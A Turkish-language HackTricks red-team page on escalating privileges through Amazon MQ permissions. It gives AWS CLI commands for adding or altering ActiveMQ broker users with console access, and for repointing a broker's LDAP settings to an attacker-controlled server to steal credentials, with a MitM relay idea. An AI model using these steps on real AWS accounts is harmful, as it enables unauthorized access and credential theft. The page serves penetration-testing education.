AWS - MQ Privesc

htARTE (HackTricks AWS Kırmızı Takım Uzmanı) ile sıfırdan kahraman olmak için AWS hackleme öğrenin!

HackTricks'i desteklemenin diğer yolları:

MQ

MQ hakkında daha fazla bilgi için kontrol edin:

AWS - MQ Enum

mq:ListBrokers, mq:CreateUser

Bu izinlerle birlikte, bir ActimeMQ broker'ında yeni bir kullanıcı oluşturabilirsiniz (bu RabbitMQ'da çalışmaz):

aws mq list-brokers
aws mq create-user --broker-id <value> --console-access --password <value> --username <value>

Potansiyel Etki: ActiveMQ üzerinde gezinerek hassas bilgilere erişim

mq:ListBrokers, mq:ListUsers, mq:UpdateUser

Bu izinlerle birlikte bir ActimeMQ brokerinde yeni bir kullanıcı oluşturabilirsiniz (bu RabbitMQ'da çalışmaz):

aws mq list-brokers
aws mq list-users --broker-id <value>
aws mq update-user --broker-id <value> --console-access --password <value> --username <value>

Potansiyel Etki: ActiveMQ üzerinden hassas bilgilere erişim sağlama

mq:ListBrokers, mq:UpdateBroker

Eğer bir broker ActiveMQ ile yetkilendirme için LDAP kullanıyorsa. Saldırgan tarafından kontrol edilen bir LDAP sunucusunun yapılandırması değiştirilebilir. Bu şekilde saldırgan, LDAP üzerinden gönderilen tüm kimlik bilgilerini çalmayı başarabilir.

aws mq list-brokers
aws mq update-broker --broker-id <value> --ldap-server-metadata=...

Eğer ActiveMQ tarafından kullanılan orijinal kimlik bilgilerini bulabilirseniz, bir MitM gerçekleştirebilir, kimlik bilgilerini çalabilir, bunları orijinal sunucuda kullanabilir ve yanıtı gönderebilirsiniz (belki çalınan kimlik bilgilerini yeniden kullanarak bunu yapabilirsiniz).

Potansiyel Etki: ActiveMQ kimlik bilgilerini çalmak

htARTE (HackTricks AWS Red Team Expert)

HackTricks'ı desteklemenin diğer yolları:

Last updated